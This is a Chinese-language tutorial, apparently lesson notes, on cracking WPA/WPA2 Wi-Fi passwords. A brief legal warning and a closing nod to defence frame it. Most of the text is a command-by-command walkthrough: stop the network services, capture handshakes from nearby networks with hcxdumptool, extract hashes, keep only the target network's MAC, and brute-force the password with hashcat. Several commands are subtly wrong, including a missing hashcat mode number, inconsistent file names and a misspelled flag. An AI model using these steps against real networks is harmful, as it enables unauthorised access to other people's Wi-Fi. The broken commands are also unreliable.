准备朗读
可能触及三项罪名:
1、破坏计算机信息系统罪
《刑法》第286条:违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。
2、非法侵入计算机信息系统罪
《刑法》第285条:违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
3、盗窃罪
《刑法》第264条:盗窃公私财物,数额较大或者多次盗窃的,处三年以下有期徒刑、拘役或者管制,并处或者单处罚金;数额巨大或者有其他严重情节的,处三年以上十年以下有期徒刑,并处罚金;数额特别巨大或者有其他特别严重情节的,处十年以上有期徒刑或者无期徒刑,并处罚金或者没收财产。
上一节课介绍了如何抓包
抓包 这个包就在你当时执行命令的目录下 (如果没有特定的选择目录)

利用Wireshark 进行抓包分析

安装 hcxdumptool
hcxdumptool是一款无线认证信息抓包工具。通过进行抓包测试,可以验证AP和客户端是否存在漏洞。hcxdumptool工具可以捕获特定类型的数据包。而且,它还可以通过指定扫描的信道,设置过滤规则等方式来捕获无线数据包。
安装 hcxpcapngtool
将 WPA / WPA2 握手从 pcap 捕获文件上传并提取
拉取
hcxdumptool
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
sudo apt-get install libcurl4-openssl-dev libssl-dev pkg-config
make
make install
hcxdumptool --help
安装hashcak
hashcat --version
v6.2.5
NetworkManager
NetworkManager 服务是管理和监控网络设置的守护进程
wpa_supplicant
pa_supplicant是Linux BSD, Mac OSX和Windows的WPA的服务,支持WPA和WPA2(IEEE 802.11i/RSN),它适用于台式机/笔记本和嵌入式系统,Supplicant是在客户端站中使用的IEEE 802.1X/WPA组件,它使用WPA身份验证器实现秘钥协商,并控制漫游和IEEEE802.11认证/关联的WLAN驱动程序
暂时将他俩关闭
systemctl stop NetworkManager.service
systemctl stop wpa_supplicant.service
开始抓包
hcxdumptool -i wlan0 -o dumpfile.pcapng --active_beacon --enable_status=15
-i 自动启动监听模式
-o pcapng格式的输出文件
--active_beacoon 多少次发送一次信标
--enable_status 启用实时显示
可以开启服务了
systemctl start NetworkManager.service
systemctl start wpa_supplicant.service
将文件转译
hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng.
以后参数我就不解释了 自己 --help 去看看
ls 一下你就看到了你需要的文件
查看附近的wifi名称
cat essidlist
剩下的抓手包在另外一个文件
cat hash.hc22000
可以看随手笔记2 中抓获的我测试小米11的MAC地址
打开hash文件
cp hash.hc220000 hash.hc220000.bc
vim hash.hc220000
将所有不包含你所感兴趣的wifiMAC地址删除掉
:v/填写mac地址/d
准备好密码本
hashcat -m hash.hc220000 "你自己的密码本"
如果你没有密码本 也可以
hashcat -m hash.hc220000 ?d?d?d?d?d?d?d?d
如果你忘记了位数
-a 3 --increment --increment-min 8 --increment--max 12 ?d?d?d?d?d?d?d?d?d?d?d?d?d
总结 请阅读第一行法律内容
已经知道了怎么去破解wifi 就要做到怎么防御。你们可以讨论一下